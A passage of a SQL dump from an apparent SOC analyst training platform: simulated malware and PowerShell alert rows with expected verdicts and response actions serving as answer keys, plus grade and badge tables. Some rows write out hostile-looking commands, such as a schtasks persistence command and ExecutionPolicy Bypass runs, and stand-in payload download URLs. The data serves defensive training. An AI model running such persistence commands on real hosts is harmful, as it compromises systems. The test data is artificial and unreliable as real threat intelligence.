address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e1f2a3d4c5b6f7e8d9c0b1a2e3f4d5c6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document containing macros linked to credential dumping\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand Y3JlZGVudGlhbHMuZHVtcA==\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command for potential credential dumping\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The reverse-engineered document contained a malicious macro designed for credential theft.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2238, 'Malware Detected via Packed Executable Analysis', 'high', 'Cuckoo Sandbox', 'A packed executable was analyzed and found to contain malicious code targeting persistence mechanisms. Reverse engineering confirmed the presence of code injection techniques.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"hostname\":\"HR-PC\",\"command_line\":\"rundll32.exe shell32.dll,ShellExec_RunDLL packed_malware.exe\",\"file_hash\":\"a1b2c3d4e5f67890\",\"domain\":\"maliciousdomain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variants\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for command and control\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"rundll32.exe shell32.dll,ShellExec_RunDLL packed_malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line execution pattern matches malware behavior\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable shows typical malware behavior, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2239, 'Suspicious Macro Detected in Office Document', 'medium', 'Any.Run', 'A macro embedded within a Word document attempted to execute a remote script. Analysis indicates potential phishing attempt.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:22:01Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.30\",\"username\":\"mwhite\",\"hostname\":\"Finance-Laptop\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File macro.ps1\",\"file_hash\":\"f5e8d9c0b1e23456\",\"email_sender\":\"trusted@company.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f5e8d9c0b1e23456\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not recognized as malicious\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Email domain legitimate and not spoofed\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File macro.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PowerShell script execution observed but not conclusively malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro activity matches benign scripts from a trusted sender, indicating a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2240, 'Malicious Macro Execution in Office Document', 'critical', 'Ghidra', 'An Office document containing a malicious macro was executed, leading to the download and execution of a secondary payload.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"203.0.113.75\",\"username\":\"ksmith\",\"hostname\":\"Marketing-PC\",\"command_line\":\"winword.exe /m malicious_macro.docm\",\"file_hash\":\"b7a8c9d0e2f33456\",\"url\":\"http://malicious-site.com/payload.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b7a8c9d0e2f33456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a downloader for ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts known malware payloads\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"winword.exe /m malicious_macro.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command line behavior associated with macro-based attacks\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro executed a known malicious payload, confirmed by multiple threat intelligence sources.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2241, 'Benign PowerShell Activity Detected', 'low', 'IDA Pro', 'PowerShell script execution was observed, but analysis indicates it is part of regular system maintenance.', 'Malware', 'T1086', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:15:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"admin\",\"hostname\":\"Server-01\",\"command_line\":\"powershell.exe -ExecutionPolicy RemoteSigned -File maintenance.ps1\",\"file_hash\":\"d3f4e5f6g7h8i901\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a trusted server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d3f4e5f6g7h8i901\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not found in any malicious reports\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy RemoteSigned -File maintenance.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution pattern consistent with routine maintenance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell script is part of a scheduled maintenance task, confirmed as non-malicious.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2242, 'Macro-Based Malware Persistence Attempt', 'high', 'Cuckoo Sandbox', 'A macro from an Office document executed a script attempting to establish persistence on the host system.', 'Malware', 'T1547', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:40:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"Sales-PC\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"& {Start-Process -FilePath \'schtasks.exe\' -ArgumentList \'/Create /SC ONSTART /TN Update /TR C:\\\\Scripts\\\\payload.exe\'}\\\"\",\"file_hash\":\"a9b8c7d6e5f43210\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in malware distribution activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a9b8c7d6e5f43210\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known persistence mechanism\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"& {Start-Process -FilePath \'schtasks.exe\' -ArgumentList \'/Create /SC ONSTART /TN Update /TR C:\\\\Scripts\\\\payload.exe\'}\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of establishing persistence\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro\'s execution path and command line arguments match known persistence techniques used by malware.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2243, 'Packed Executable Detected with Suspicious Network Activity', 'high', 'Cuckoo Sandbox', 'A packed executable was analyzed and detected making suspicious network connections. Reverse engineering revealed obfuscated code attempting to contact a known malicious IP.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-05\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\packed_exe.exe\",\"file_hash\":\"ab1234f6de89b6789c12345678d12345\",\"domain\":\"malicious.example.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware command and control.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ab1234f6de89b6789c12345678d12345\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with phishing and malware distribution.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable exhibited behavior typical of malware, including network connections to a known malicious IP.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2244, 'Malicious Macro Detected in Excel File', 'critical', 'Any.Run', 'An Excel file containing a malicious macro was identified. The macro attempts to download and execute additional payloads from a remote server.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"198.51.100.22\",\"username\":\"asmith\",\"hostname\":\"finance-pc\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\Office16\\\\EXCEL.EXE /e /m\",\"file_hash\":\"1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p\",\"url\":\"http://maliciousdownload.example.com/payload.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in distributing malware payloads.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdownload.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL hosts malicious executables.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malware campaigns.\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro within the Excel file is characteristic of malware delivery mechanisms, attempting to download and execute additional payloads.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2245, 'Suspicious PowerShell Execution Detected', 'medium', 'Ghidra', 'A PowerShell command was executed that appears to be encoded. Further analysis is required to determine if this is part of a legitimate script or a potential attack.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"\",\"username\":\"bharris\",\"hostname\":\"dev-machine\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQB4AGUAYwAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the development machine.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQB4AGUAYwAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command detected; further analysis required.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command appears to be part of a legitimate script used for maintenance tasks within the tech department.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2246, 'Obfuscated Code Detected in Analysis', 'high', 'IDA Pro', 'Code analysis revealed obfuscated instructions within a recently downloaded executable, exhibiting characteristics of a packed malware sample.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.10\",\"username\":\"mjones\",\"hostname\":\"security-laptop\",\"command_line\":\"C:\\\\Downloads\\\\suspicious_packed.exe\",\"file_hash\":\"def4567890abcdef1234567890abcdef\",\"domain\":\"unknown\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the security analyst\'s laptop.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"def4567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known packed malware sample.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The obfuscated code within the executable suggests it is a packed malware sample, designed to evade detection.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2247, 'Unusual Network Activity from Development Environment', 'medium', 'Any.Run', 'Detected network activity from a development server that closely resembles known benign traffic; further context required to confirm.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.40\",\"username\":\"devuser\",\"hostname\":\"dev-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a development server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of another server within the development environment.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network activity is consistent with regular data transfers between servers in the development environment.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2248, 'Suspicious Packed Executable Detected via IDA Pro', 'high', 'IDA Pro', 'A packed executable was unpacked and analyzed, revealing code indicative of a malware sample attempting to maintain persistence.', 'Malware', 'T1547', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-XYZ\",\"command_line\":\"C:\\\\Windows\\\\system32\\\\cmd.exe /c start C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Executable analysis confirmed presence of malware attempting persistence.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2249, 'Potential Malware Execution via Ghidra Analysis', 'critical', 'Ghidra', 'Ghidra analysis identified a suspicious process execution chain indicating possible malware behavior.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"45.33.32.156\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.33.32.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Command and Control servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to previous malware samples\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded command and hash analysis confirm malware execution attempt.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2250, 'Macro Exploit Detected in Excel File via Any.Run', 'medium', 'Any.Run', 'A suspicious Excel file containing macros was executed, leading to potential malware installation on the host.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:20:00Z\",\"event_type\":\"file_open\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"198.51.100.10\",\"username\":\"mike\",\"hostname\":\"LAPTOP-123\",\"command_line\":\"excel.exe /x C:\\\\Users\\\\mike\\\\Documents\\\\Invoice.xlsm\",\"file_hash\":\"45c48cce2e2d7fbdea1afc51c7c6ad26\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of user machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous macro exploit campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"45c48cce2e2d7fbdea1afc51c7c6ad26\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as malicious macro\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Macro analysis and IP correlation confirm delivery of malicious payload.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2251, 'False Positive: Legitimate Software Installation Flagged', 'low', 'Cuckoo Sandbox', 'A legitimate software installation via a well-known vendor was incorrectly flagged as suspicious due to heuristic triggers.', 'Malware', 'T1129', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"8.8.8.8\",\"username\":\"alex\",\"hostname\":\"OFFICE-PC\",\"command_line\":\"C:\\\\Program Files\\\\TrustedInstaller\\\\setup.exe\",\"file_hash\":\"098f6bcd4621d373cade4e832627b4f6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of user machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Public DNS\",\"verdict\":\"clean\",\"details\":\"Google DNS server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"098f6bcd4621d373cade4e832627b4f6\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash corresponds to a known software installer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Trusted installer identified, no malicious activity detected.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2252, 'False Positive: Routine Software Update Misidentified', 'low', 'Ghidra', 'A routine software update was misidentified as a potential malware installation due to unusual network activity during the update.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"151.101.1.69\",\"username\":\"susan\",\"hostname\":\"WORKSTATION-02\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"c4ca4238a0b923820dcc509a6f75849b\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of user workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"151.101.1.69\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP belongs to a well-known CDN used for software updates\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"c4ca4238a0b923820dcc509a6f75849b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash corresponds to a known software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Update confirmed as legitimate, no malicious indicators present.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0);

-- --------------------------------------------------------

--
-- Table structure for table `alert_grades`
--

CREATE TABLE `alert_grades` (
  `id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `grade` int(11) DEFAULT NULL,
  `feedback` text DEFAULT NULL,
  `graded_by` int(11) DEFAULT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `badges`
--

CREATE TABLE `badges` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `icon_url` varchar(255) DEFAULT NULL,
  `badge_type` enum('path_completion','milestone','streak','special') DEFAULT 'milestone',
  `criteria` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  `xp_reward` int(11) DEFAULT 0,
  `created_at` timestamp NULL DEFAULT current_timestamp()
) ;

--
-- Dumping data for table `badges`
--

INSERT INTO `badges` (`id`, `name`, `description`, `icon_url`, `badge_type`, `criteria`, `xp_reward`, `created_at`) VALUES
(1, 'First Steps', 'Completed your first task in the learning path', NULL, 'milestone', NULL, 50, '2025-12-26 00:33:07'),
(2, 'Linux Novice', 'Completed the Linux Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(3, 'Windows Explorer', 'Completed the Windows Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(4, 'Network Navigator', 'Completed the Networking Essentials module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(5, 'Security Foundations', 'Completed the Pre-Security Fundamentals path', NULL, 'path_completion', NULL, 500, '2025-12-26 00:33:07'),
(6, 'Field Operative', 'Awarded for completing your first mobile investigation.', '📱', 'milestone', '{\"manual\": true}', 100, '2026-01-13 17:09:09'),
(7, 'On The Go', 'Awarded for completing 10 investigations on mobile.', '⚡', 'milestone', '{\"manual\": true}', 300, '2026-01-13 17:09:09'),
(8, 'Early Bird', 'Completed an investigation in the early morning (5 AM - 8 AM).', NULL, 'special', '{\"time_range\": \"early_bird\"}', 100, '2026-01-13 18:37:35'),
(9, 'Night Owl', 'Completed an investigation late at night (12 AM - 4 AM).', NULL, 'special', '{\"time_range\": \"night_owl\"}', 100, '2026-01-13 18:37:35'),
